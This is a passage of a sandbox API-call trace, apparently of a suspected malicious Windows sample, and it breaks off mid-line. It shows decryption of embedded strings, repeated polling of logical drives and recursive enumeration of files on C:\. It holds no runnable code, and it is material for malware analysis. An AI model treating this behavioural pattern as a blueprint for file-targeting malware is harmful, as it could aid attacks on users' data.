[0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a6a110 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69e18 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x80) returned 0x2a6a258 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69f38 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4) returned 0x2a69ff0 [0044.818] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a160, Size=0x82) returned 0x2a6a2e0 [0044.818] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a69ff0, Size=0x100) returned 0x2a6a370 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69e30 [0044.818] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x82) returned 0x2a6a478 [0044.819] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a69ed8 [0044.819] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x82) returned 0x2a6a508 [0044.819] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a2e0, Size=0x104) returned 0x2a6a598 [0044.819] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a370, Size=0x200) returned 0x2a6a6a8 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a110 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a6a8 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69f38 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a1d0 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69e90 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a258 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69e18 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a598 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ef0 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a478 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69e30 | out: hHeap=0x2a60000) returned 1 [0044.819] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a508 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ed8 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a60598 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69de8 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ce0 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69e00 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69c58 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69f98 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a000 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69e48 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a614f8 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b00 | out: hHeap=0x2a60000) returned 1 [0044.820] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xa4) returned 0x2a69c58 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69f50 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69ec0 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a681a0 | out: hHeap=0x2a60000) returned 1 [0044.820] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69fb0 | out: hHeap=0x2a60000) returned 1 [0044.820] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x14) returned 0x2a614f8 [0044.820] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0xe) returned 0x2a69ea8 [0044.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b3bdf, lpParameter=0x2a614f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c8 [0044.821] CloseHandle (hObject=0x2c8) returned 1 [0044.821] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0xffffffff) Thread: id = 28 os_tid = 0x2d0 [0044.821] GetLogicalDrives () returned 0x4 [0044.821] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61518 [0044.821] CryptImportKey (in: hProv=0xf466e8, pbData=0x2f6fae4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f6fb4c | out: phKey=0x2f6fb4c*=0xf58e28) returned 1 [0044.821] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2f6fb34, dwFlags=0x0) returned 1 [0044.821] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61518, pdwDataLen=0x2f6fb00 | out: pbData=0x2a61518, pdwDataLen=0x2f6fb00) returned 1 [0044.821] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.821] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a64b00 [0044.821] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a64b28 [0044.821] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68958 [0044.821] CryptImportKey (in: hProv=0xf466e8, pbData=0x2f6fabc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f6fb24 | out: phKey=0x2f6fb24*=0xf590a8) returned 1 [0044.821] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x2f6fb0c, dwFlags=0x0) returned 1 [0044.821] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68958, pdwDataLen=0x2f6fad8 | out: pbData=0x2a68958, pdwDataLen=0x2f6fad8) returned 1 [0044.821] CryptDestroyKey (hKey=0xf590a8) returned 1 [0044.821] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68958 | out: hHeap=0x2a60000) returned 1 [0044.821] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a64b00, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.821] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b28 | out: hHeap=0x2a60000) returned 1 [0044.822] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61518 | out: hHeap=0x2a60000) returned 1 [0044.822] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2f6fb8c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2f6fb8c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.822] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64b00 | out: hHeap=0x2a60000) returned 1 [0044.822] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a64b00 [0044.822] CryptImportKey (in: hProv=0xf466e8, pbData=0x2f6fb18, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f6fb80 | out: phKey=0x2f6fb80*=0xf58e28) returned 1 [0044.822] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x2f6fb68, dwFlags=0x0) returned 1 [0044.822] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a64b00, pdwDataLen=0x2f6fb34 | out: pbData=0x2a64b00, pdwDataLen=0x2f6fb34) returned 1 [0044.822] CryptDestroyKey (hKey=0xf58e28) returned 1 [0044.822] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a64b48 [0044.822] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2c8 [0044.822] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2cc [0044.822] GetLogicalDrives () returned 0x4 [0044.822] Sleep (dwMilliseconds=0x3e8) [0046.058] GetLogicalDrives () returned 0x4 [0046.058] Sleep (dwMilliseconds=0x3e8) [0047.278] GetLogicalDrives () returned 0x4 [0047.278] Sleep (dwMilliseconds=0x3e8) [0048.775] GetLogicalDrives () returned 0x4 [0048.792] Sleep (dwMilliseconds=0x3e8) [0050.050] GetLogicalDrives () returned 0x4 [0050.050] Sleep (dwMilliseconds=0x3e8) [0051.389] GetLogicalDrives () returned 0x4 [0051.389] Sleep (dwMilliseconds=0x3e8) [0052.982] GetLogicalDrives () returned 0x4 [0052.982] Sleep (dwMilliseconds=0x3e8) [0054.575] GetLogicalDrives () returned 0x4 [0054.575] Sleep (dwMilliseconds=0x3e8) [0056.052] GetLogicalDrives () returned 0x4 [0056.053] Sleep (dwMilliseconds=0x3e8) [0057.283] GetLogicalDrives () returned 0x4 [0057.283] Sleep (dwMilliseconds=0x3e8) [0058.535] GetLogicalDrives () returned 0x4 [0058.538] Sleep (dwMilliseconds=0x3e8) [0060.115] GetLogicalDrives () returned 0x4 [0060.115] Sleep (dwMilliseconds=0x3e8) [0061.534] GetLogicalDrives () returned 0x4 [0061.534] Sleep (dwMilliseconds=0x3e8) [0062.783] GetLogicalDrives () returned 0x4 [0062.783] Sleep (dwMilliseconds=0x3e8) [0064.081] GetLogicalDrives () returned 0x4 [0064.081] Sleep (dwMilliseconds=0x3e8) [0065.497] GetLogicalDrives () returned 0x4 [0065.497] Sleep (dwMilliseconds=0x3e8) [0066.720] GetLogicalDrives () returned 0x4 [0066.720] Sleep (dwMilliseconds=0x3e8) [0068.277] GetLogicalDrives () returned 0x4 [0068.277] Sleep (dwMilliseconds=0x3e8) [0069.457] GetLogicalDrives () returned 0x4 [0069.457] Sleep (dwMilliseconds=0x3e8) Thread: id = 29 os_tid = 0x260 [0045.035] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x38) returned 0x2a69d48 [0045.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x18) returned 0x2a69d88 [0045.038] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2e8 [0045.038] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2ec [0045.038] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2f0 [0045.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3320280 [0045.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x9b3a08, lpParameter=0x31af7b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0045.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x9b3a08, lpParameter=0x31af7b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f8 [0045.039] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3330288 [0045.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x31af524 | out: lpFindFileData=0x31af524*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff654, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xf58ea8 [0045.040] GetLastError () returned 0x0 [0045.040] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x214) returned 0x2a6a1d0 [0045.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0045.040] GetCurrentThreadId () returned 0x260 [0045.040] SetLastError (dwErrCode=0x0) [0045.040] GetLastError () returned 0x0 [0045.040] SetLastError (dwErrCode=0x0) [0045.040] GetLastError () returned 0x0 [0045.040] SetLastError (dwErrCode=0x0) [0045.040] GetLastError () returned 0x0 [0045.040] SetLastError (dwErrCode=0x0) [0045.040] GetLastError () returned 0x0 [0045.041] SetLastError (dwErrCode=0x0) [0045.041] GetLastError () returned 0x0 [0045.041] SetLastError (dwErrCode=0x0) [0045.041] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3340290 [0045.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xf590a8 [0045.041] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0045.041] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="Logs", cAlternateFileName="")) returned 1 [0045.041] GetLastError () returned 0x0 [0045.041] SetLastError (dwErrCode=0x0) [0045.041] GetLastError () returned 0x0 [0045.041] SetLastError (dwErrCode=0x0) [0045.041] GetLastError () returned 0x0 [0045.041] SetLastError (dwErrCode=0x0) [0045.041] GetLastError () returned 0x0 [0045.042] SetLastError (dwErrCode=0x0) [0045.042] GetLastError () returned 0x0 [0045.042] SetLastError (dwErrCode=0x0) [0045.042] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3350298 [0045.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf58ee8 [0045.043] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.043] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.043] SetLastError (dwErrCode=0x0) [0045.043] GetLastError () returned 0x0 [0045.044] SetLastError (dwErrCode=0x0) [0045.044] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.045] SetLastError (dwErrCode=0x0) [0045.045] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.046] SetLastError (dwErrCode=0x0) [0045.046] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.047] SetLastError (dwErrCode=0x0) [0045.047] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.048] SetLastError (dwErrCode=0x0) [0045.048] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.049] SetLastError (dwErrCode=0x0) [0045.049] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.050] SetLastError (dwErrCode=0x0) [0045.050] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.051] SetLastError (dwErrCode=0x0) [0045.051] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] SetEvent (hEvent=0x2ec) returned 1 [0045.052] ResetEvent (hEvent=0x2f0) returned 1 [0045.052] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.052] SetLastError (dwErrCode=0x0) [0045.052] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError 